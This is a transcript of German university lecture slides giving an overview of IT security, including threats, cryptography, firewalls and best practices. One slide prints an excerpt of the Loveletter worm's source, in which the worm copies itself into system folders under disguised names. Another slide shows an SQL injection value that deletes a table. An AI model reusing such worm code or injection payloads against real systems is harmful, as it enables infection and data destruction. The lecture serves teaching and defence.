Die Präsentation wird geladen. Bitte warten

Die Präsentation wird geladen. Bitte warten

© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 1 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems IT Sicherheit Ein Überblick.

Ähnliche Präsentationen


Präsentation zum Thema: "© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 1 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems IT Sicherheit Ein Überblick."—  Präsentation transkript:

1 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 1 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems IT Sicherheit Ein Überblick

2 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 2 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems

3 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 3 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems

4 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 4 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems

5 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 5 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems

6 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 6 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Zahlen... Quelle: CERT® Coordination Center, Software Engineering Institute, Carnegie Mellon University June 2005

7 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 7 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Internetkriminalität Quelle: Bundeskriminalamt 2004

8 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 8 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Inhalt l Überblick l Potentielle Risiken (Auswahl) l Beispiele für Lösungen »Authentisierung –Wer greift auf Daten/Systeme zu ? »Verschlüsselung –Daten vertraulich halten »Firewall –Netze gegen Angreifer schützen l Was tun ?

9 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 9 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Datensicherheit: DIN 44300, Teil 1. l Schutz von Daten gegen Beeinträchtigung (Verlust, Zerstörung, Änderung) und vor Mißbrauch l Datenschutz: Schutz von Personen vor Beeinträchtigungen durch Verarbeitung von Daten Spionage Betrug (Nicht-) Verfügbarkeit Sabotage

10 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 10 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Sicherheitskriterien l Integrität »Konsistenz »Korrektheit DoS, DDoS, mail flooding l Vertraulichkeit »Zugriff nur durch berechtigte Personen Hacker l Verbindlichkeit »Authentisierung von Nutzern »Persistenz fake orders spoofing l Verfügbarkeit »Zugriff jederzeit möglich Spionage Betrug Nicht- Verfügbarkeit Sabotage Beispiele für Risiken Viren Schaden weltweit 2003: 50 Milliarden $ ???

11 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 11 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems MS Outlook Loveletter: Liebe macht @

12 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 12 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Loveletter Quelltext (Auszug) rem barok -loveletter(vbe) rem by: spyder / Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs").... rem barok -loveletter(vbe) rem by: spyder / Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")....

13 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 13 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Aktuelle Viren Intervall zwischen Entdeckungn und Schutz durch Anti-Viren Software !

14 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 14 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems SQL-Injection File index.htm... $selstring = "SELECT * FROM Address WHERE name=$sstring'"; $conn = pg_Connect("localhost", "5432","","","somedb"); $result = pg_Exec($conn, $selstring);... File db-request.php Maier Maier; delete from address

15 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 15 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Distributed Denial-of-Service Attack (DDoS). victim Angriff slave installing a demon master Hack Angreifer Probleme: Unterschied zwischen echten und falschen Anfragen Verteilte Netzwerk- Infrastruktur Intrusion Detection Systems

16 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 16 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Wardriving, LAN jacking

17 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 17 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Gegenmaßnahmen VerfügbarkeitVerbindlichkeitVertraulichkeitIntegrität intrusion detection Digitale Signaturen Verschlüssel- ung, VPN Firewall Zugangs- kontrolle Backup Pasßwort Biometrie Virenscanner Managed Security Services

18 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 18 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Script Kiddies Nötige Vorkenntnisse der Hacker complexity of hacker tools source: c't 2/2002, S. 79 guessing of passwords viruses cracking of passwords intrusion into not secured system web worms

19 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 19 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Beispiel: Unberechtigten Zugriff verhindern l user identification »Passwort, Biometrie, Authentisierungsverfahren l Nutzerrechte »Wer darf auf welche Resourcen zugreifen l Zugriffskontrolle »firewall, Intrusion Detection Systeme l Verschlüsselung »Zugriff auf Daten bleibt zwar möglich, diese sind aber nutzlos

20 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 20 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems lBrute force hack »Ausprobieren aller Buchstabenkombinationen lDictionary hack »Systematisches Ausprobieren von häufiger verwendeten Wörtern (aus Worllisten) »Hybride Verfahren : Kombination von Wörterbuch und Ausprobieren von Buchstanben/Zahlen lSpionage »Blick über die Schulter »Trojanische Pferde, key logger lSocial Engineering »Ausnutzen der Naivität von Anwendern »Z.B. fake mail an Angestellte mit sender spoofing ("IT security dept.") zur Abfrage von Kennwörtern »Studie von BBC News zeigte, daß 92% der Teilnehmer bereit waren, persönliche Angaben wie etwa Geburtsname der Mutter, Grundschule,... Zu verraten (Comm. ACM Vol. 48/6 p. 10) Password cracking.

21 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 21 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Default Kennwörter

22 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 22 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Ziemlich einfach...

23 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 23 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Social Engineering. Original und Fälschung

24 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 24 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Beispiel Telekom Phishing mail

25 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 25 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Biometrie

26 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 26 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems eTokens.

27 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 27 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Verschlüsselung Problem Datenübertragung über öffentliche Netze ist öffentlich ! (insbesondere bei Funknetzen) Lösung Private Netze (teuer) oder Verschlüsselung: Der Absender wendet (mathematische) Funktion auf die Daten an, die nur (!) vom Empfänger rückgängig gemacht werden kann Absender: E = e(K,M) : K = key, M = message Empfänger: M = d(K,E) : E = encrypted message, Funktioniert, wenn M = d(K,e(K,M))

28 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 28 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Substitutionsschlüssel Einfache Verschlüsselungstechnik: Jedes Zeichen wird durch ein anderes ersetzt Das Transformationsschema ist der Schlüssel: Originalalphabet: abcdefghijklmnopqrstuvwxyz Schlüssel: qfwgxbdkpjhyzstiarnouvcelm Verschlüsselter Text: q wkpbbrx kqn ot xsnurx xauqy irtfqfpypopxn btr qyy wkqrqwoxrn ot irxvxso npziyx brxauxswl fqnxg qsqylnpn q npziyx nufnopouopts pn sto nubbpwpxso qslftgl cpok q fpo tb opzx tr q wtziuoxr wqs frxqh nuwk wtgxn xqnpyl okxnx wtgxn cxrx unxg usopy okx spsxoxxsok wxsourl qsg cxrx rxiyqwxg fl wtgxn okqo wkqsdx okx nufnopouopts iqooxrs cpok xqwk wkqrqwoxr

29 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 29 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Kryptoanalyse Relative Häufigkeit der einzelnen Buchstaben Im verschlüsselten TextIn (englischem) Text a b c d e f g h i j k l m n o p q r s t u v w x y z a b c d e f g h i j k l m n o p q r s t u v w x y z 0.002

30 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 30 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Entschlüsselter Text a chiffre has to ensure equal probabilities for all characters to prevent simple frequency based analysis a simple substitution is not sufficient anybody with a bit of time or a computer can break such codes easily these codes were used until the nineteenth century and were replaced by codes that change the substitution pattern with each character Gedankenexperiment: Eine Nachricht ist genau ein Zeichen lang Ist hier Kryptoanalyse möglich ? Nein ! Wenn der Schlüssel (mindestens) die gleiche Länge hat, wie die Nachricht, kann sie nicht entschlüsselt werden ! One time pad

31 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 31 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Enigma

32 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 32 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Moderne Verschlüsselungsverfahren l Kombination von Substitution und Transposition »DES (alt), AES (neu) l symmetrisch: Schlüssel für Sender und Empfänger gleich »Problem: Wie übermittelt man den Schlüssel ? –An viele Partner –Lange Schlüssel (one time pad) »Ungelöst ! l asymmetrisch: unterschiedliche Schlüssel zum Ver- und Entschlüsseln »Public/Private key »Diskrete Mathematik: Faktorisierung großer Zahlen ist (extrem) rechenaufwändig l Signatur: one way functions

33 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 33 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Integrität l unbeabsichtigte Änderungen »Übertragungsfehler, Hardware,... l Prüsummen »beabsichtigte Änderungen »Prüfsummen sind leicht zu fälschen »krypthografische Verfahren

34 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 34 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Beispiel: MD5 l erzeugt aus einer beliebig langen Nachricht einen 128 Bit langen Wert l Beispiel: Der Text Heute ist schönes Wetter ergibt den Hash a353cee72e e2f89fb a Empfänger berechnet ebenfalls den MD5 Hash der Nachricht und vergleicht mit dem übermittelten, Üereinstimmung --> Nachricht korrekt übermittelt l Problem: Dritte Partei fängt die Nachricht ab und ersetzt sie durch eine andere (mit neuem, passenden hash) l Löung: Der Absender verschlüsselt den hash-Wert mit seinem private key. Der Empfänger überprüft nach Entschlüsselung mit dem public key des Absenders.(Digitale Signatur)

35 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 35 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Firewalls Internet LAN Firewall Eine Firewall ist ein zentraler Kontrollpunkt zwischen dem Internet und dem LAN

36 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 36 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Router Internet Router leitet IP-Pakete weiter, vom LAN ins Internet, vom Internet ins LAN Screening Router (Paketfilter) leitet nur Pakete weiter, die def. Regeln entsprechen (IP-Adressen, Ports usw.)

37 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 37 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Personal firewall Internet Computer Browser Mail client Application Personal Firewall Eine personal firewall ist ein eingebauter Paketfilter, der anwendungsbezogen filtert Die Sicherheit ist fragwürdig Oft kombiniert mit Viren-Scanner

38 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 38 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Was wird gemacht ? antivirus software Virtual Private Networks (VPN) automatic backup personal firewalls content filtering intrusion detection systems network firewalls application irewalls Dial-Back- or secure modems Germany USA source: IT-Security 2003; Juni-Juli, 2500 Interviews with CIOs; in Percent

39 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 39 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Best practices. l Einsatz einer application layer firewall. l Automatische Updates der Virenschutz-Software auf Firewall, Servern und Clients l Aktuelle Updates einspielen: Hackers nutzen oft bekannte Sicherheitslücken aus, um in Systeme einzubrechen l Abschalten aller nicht benötigten Dienste l Löschen aller nicht benötigten Programme l Netzwerke nach backdoors, Trojanern und anderen Sicherheitslücken scannen, Intrusion Detection Systeme verwenden

40 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 40 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Probleme bei sicheren Systemen l Die meisten (einfachen) Angriffe sind leicht abzublocken l Wie hält man qualifizierte/motivierte Hacker auf ? l Tradeoff: Sicherheit UsabilityKosten Problem: Schlechte Usability kann Sicherheit verschlechtern: Restriktive Password policy --> schwer zu merken --> Nutzer schreiben Passwörter auf oder verwenden Standardpaßwort

41 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 41 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Clevere Lösungen..... l Persönliche Fragen statt Kennwörtern »personal entropy »Name Ihres Haustiers ? »Der Name von Paris Hiltons Hund ist Tinkerbell (Bunte o.ä.) »Ihr T-Mobile Account wurde gehackt l Nach mehrfacher Eingabe eines falschen Kennworts wird der login für bestimmte Zeit gesperrt »Sie bieten auf einen Artikel bei ebay und wissen den Namen eines Mitbieters, versuchen sich mit seinem Namen und einem beliebigen Kennwort anzumelden --> sein Account wird geblockt --> Denial of Service attack l Was wäre, wenn Geldautomaten den Fingerabdruck prüfen würden ? »Vielleicht weniger Betrug ? »Vielleicht mehr Raubüberfälle? (siehe Wegfahrsperre)

42 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 42 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Auch die fortschrittlichste Technologie....

43 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 43 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Läßt sich umgehen, wenn man wirklich will....

44 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 44 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Man kann Angreifern nur das Leben schwerer machen

45 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 45 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Es gibt keine absolute Sicherheit l Wenn jemand behauptet, ein unknackbares System zu haben, ist er entweder naiv, oder er lügt ! Das schwächste Glied zählt SQL-Slammer took out 20% of ATM machines in US (costed banks tens of millions of dollars), Continental coudnt fly for 12 hours, why ? Not the servers were vulnerable, but the network connections were overloaded. l Designschwächen (Protokolle, Programmiersprachen,...) »Wurden nicht für die heutigen Anwendungen konzipiert »Lösungen wären bekannt, sind aber aufwendig: –Direkter Zugriff auf den Stack bei vielen Programmiersprachen –Buffer overflows könnten verhindert werden, ist aber mehr Arbeit –SQL-injection könnte verhindert werden, ebenfalls mehr Arbeit l Programmierfehler (bugs) »ermöglichen exploits, Patches kommen immer zu spät (zero day exploits) »Fehlerfreie Software zu erstellen ist extrem schwer (unmöglich ?) »Bessere Prozeße bei der SW-Entwicklung helfen, aber...

46 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 46 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems

47 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 47 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Was ist sicher genug l Wieviel Sicherheit wird gebraucht ? »Analyse der Risiken, Schäden usw. nötig »Online Wettervorhersage vs. Online-banking l Wieviel Sicherheit ist gewollt ? »Usability »Kosten l Umgang mit Risiken »technisch »Organisatorisch (Schulungen,...) l Keine Standardlösungen l Security ist eine boomende Branche »Communications of the ACM Vol 48/6 pp. 82

48 © Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 48 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems Fragen ?


Herunterladen ppt "© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott 1 Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems IT Sicherheit Ein Überblick."

Ähnliche Präsentationen


Google-Anzeigen